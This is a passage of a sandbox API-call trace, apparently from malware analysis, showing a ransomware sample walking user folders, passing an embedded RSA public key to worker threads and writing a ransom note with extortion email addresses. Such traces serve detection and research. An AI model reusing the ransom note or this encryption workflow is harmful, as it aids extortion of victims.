returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0134.759] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0134.759] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0134.759] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x714 [0134.759] WaitForSingleObject (hHandle=0x714, dwMilliseconds=0xffffffff) returned 0x0 [0134.761] Sleep (dwMilliseconds=0x96) [0134.914] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0134.914] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0134.914] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0134.914] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0134.914] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="ntldr") returned 0x0 [0134.914] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="NTLDR") returned 0x0 [0134.914] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="NTDETECT.COM") returned 0x0 [0134.914] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="ntdetect.com") returned 0x0 [0134.914] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0134.914] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0134.914] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0134.914] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0134.914] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0134.914] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0134.914] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x718 [0134.915] Sleep (dwMilliseconds=0x96) [0135.070] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.070] lstrcmpW (lpString1="ntuser.ini", lpString2="..") returned 1 [0135.070] lstrcmpW (lpString1="ntuser.ini", lpString2=".") returned 1 [0135.070] StrStrW (lpFirst="ntuser.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0135.070] StrStrW (lpFirst="ntuser.ini", lpSrch="ntldr") returned 0x0 [0135.070] StrStrW (lpFirst="ntuser.ini", lpSrch="NTLDR") returned 0x0 [0135.070] StrStrW (lpFirst="ntuser.ini", lpSrch="NTDETECT.COM") returned 0x0 [0135.071] StrStrW (lpFirst="ntuser.ini", lpSrch="ntdetect.com") returned 0x0 [0135.071] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0135.071] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0135.071] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0135.071] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0135.071] lstrcpyW (in: lpString1=0x17dfbc, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0135.071] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0135.071] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x71c [0135.071] Sleep (dwMilliseconds=0x96) [0135.226] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.226] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.226] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.226] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.226] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.226] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.226] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.226] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.226] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.226] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0 [0135.226] FindClose (in: hFindFile=0x3a5550 | out: hFindFile=0x3a5550) returned 1 [0135.227] FindClose (in: hFindFile=0x3a5550 | out: hFindFile=0x3a5550) returned 0 [0135.227] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0135.227] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\*.*") returned="C:\\Users\\Default\\*.*" [0135.227] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0135.227] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0135.227] SetErrorMode (uMode=0x1) returned 0x1 [0135.227] wsprintfW (in: param_1=0x17d57c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\_HELP_INSTRUCTION.TXT") returned 38 [0135.227] GetUserNameW (in: lpBuffer=0x17b358, pcbBuffer=0x17b144 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17b144) returned 1 [0135.227] wsprintfW (in: param_1=0x17b150, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0135.227] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17b14c | out: phkResult=0x17b14c*=0x720) returned 0x0 [0135.227] RegQueryValueExW (in: hKey=0x720, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3ceb580, lpcbData=0x17b148*=0x104 | out: lpType=0x0, lpData=0x3ceb580*=0x65, lpcbData=0x17b148*=0x4a) returned 0x0 [0135.228] RegCloseKey (hKey=0x720) returned 0x0 [0135.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17c57c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0135.228] wsprintfW (in: param_1=0x17b57c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0135.228] CreateFileW (lpFileName="C:\\Users\\Default\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0135.228] CreateFileW (lpFileName="C:\\Users\\Default\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0135.228] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3a5550 [0135.228] PathFindFileNameW (pszPath="C:\\Users\\Default") returned="Default" [0135.228] lstrcpyW (in: lpString1=0x17d784, lpString2="Default" | out: lpString1="Default") returned="Default" [0135.230] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0135.230] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0135.230] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.230] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0135.230] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.230] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0135.230] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0135.230] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0135.230] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0135.230] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0135.231] SetErrorMode (uMode=0x1) returned 0x1 [0135.231] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0135.231] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0135.231] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\AppData\\" | out: lpString1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0135.231] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\AppData\\*.*") returned="C:\\Users\\Default\\AppData\\*.*" [0135.231] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0135.231] PathFindFileNameW (pszPath="C:\\Users\\Default\\AppData") returned="AppData" [0135.231] lstrcpyW (in: lpString1=0x17c6e4, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0135.231] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0135.231] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0135.231] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\AppData\\*.*") returned="C:\\Users\\Default\\AppData\\*.*" [0135.231] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="Desktop") returned 0x0 [0135.232] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="DESKTOP") returned 0x0 [0135.232] SetErrorMode (uMode=0x1) returned 0x1 [0135.232] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\AppData\\_HELP_INSTRUCTION.TXT") returned 46 [0135.232] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0135.232] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0135.232] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x724) returned 0x0 [0135.232] RegQueryValueExW (in: hKey=0x724, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cffe80, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cffe80*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0135.232] RegCloseKey (hKey=0x724) returned 0x0 [0135.232] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0135.232] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0135.232] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\appdata\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0135.233] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\appdata\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0135.233] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0135.233] PathFindFileNameW (pszPath="C:\\Users\\Default\\AppData") returned="AppData" [0135.233] lstrcpyW (in: lpString1=0x17c6e4, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0135.233] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0135.233] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.233] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0135.233] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0135.233] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0135.233] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0135.233] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Application Data" | out: lpString1="C:\\Users\\Default\\Application Data") returned="C:\\Users\\Default\\Application Data" [0135.233] SetErrorMode (uMode=0x1) returned 0x1 [0135.233] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Application Data" | out: lpString1="C:\\Users\\Default\\Application Data") returned="C:\\Users\\Default\\Application Data" [0135.233] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Application Data\\") returned="C:\\Users\\Default\\Application Data\\" [0135.233] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Application Data\\" | out: lpString1="C:\\Users\\Default\\Application Data\\") returned="C:\\Users\\Default\\Application Data\\" [0135.233] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Application Data\\*.*") returned="C:\\Users\\Default\\Application Data\\*.*" [0135.234] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Application Data\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0135.234] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0135.234] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Application Data" | out: lpString1="C:\\Users\\Default\\Application Data") returned="C:\\Users\\Default\\Application Data" [0135.234] lstrcatW (in: lpString1="C:\\Users\\Default\\Application Data", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Application Data\\*.*") returned="C:\\Users\\Default\\Application Data\\*.*" [0135.234] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="Desktop") returned 0x0 [0135.234] StrStrW (lpFirst="C:\\Users\\Default\\Application Data\\", lpSrch="DESKTOP") returned 0x0 [0135.234] SetErrorMode (uMode=0x1) returned 0x1 [0135.234] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Application Data\\_HELP_INSTRUCTION.TXT") returned 55 [0135.234] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0135.234] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0135.234] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x724) returned 0x0 [0135.234] RegQueryValueExW (in: hKey=0x724, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d000b0, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d000b0*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0135.234] RegCloseKey (hKey=0x724) returned 0x0 [0135.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0135.235] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0135.235] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\application data\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0135.235] CreateFileW (lpFileName="C:\\Users\\Default\\Application Data\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\application data\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0135.235] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Application Data\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0xffffffff [0135.236] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0135.236] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0135.236] lstrcmpW (lpString1="Contacts", lpString2="..") returned 1 [0135.236] lstrcmpW (lpString1="Contacts", lpString2=".") returned 1 [0135.236] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0135.236] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0135.236] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Contacts" | out: lpString1="C:\\Users\\Default\\Contacts") returned="C:\\Users\\Default\\Contacts" [0135.236] SetErrorMode (uMode=0x1) returned 0x1 [0135.236] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Contacts" | out: lpString1="C:\\Users\\Default\\Contacts") returned="C:\\Users\\Default\\Contacts" [0135.236] lstrcatW (in: lpString1="C:\\Users\\Default\\Contacts", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Contacts\\") returned="C:\\Users\\Default\\Contacts\\" [0135.236] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Contacts\\" | out: lpString1="C:\\Users\\Default\\Contacts\\") returned="C:\\Users\\Default\\Contacts\\" [0135.236] lstrcatW (in: lpString1="C:\\Users\\Default\\Contacts\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Contacts\\*.*") returned="C:\\Users\\Default\\Contacts\\*.*" [0135.236] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Contacts\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0135.237] PathFindFileNameW (pszPath="C:\\Users\\Default\\Contacts") returned="Contacts" [0135.237] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0135.237] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0135.237] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0135.237] lstrcmpW 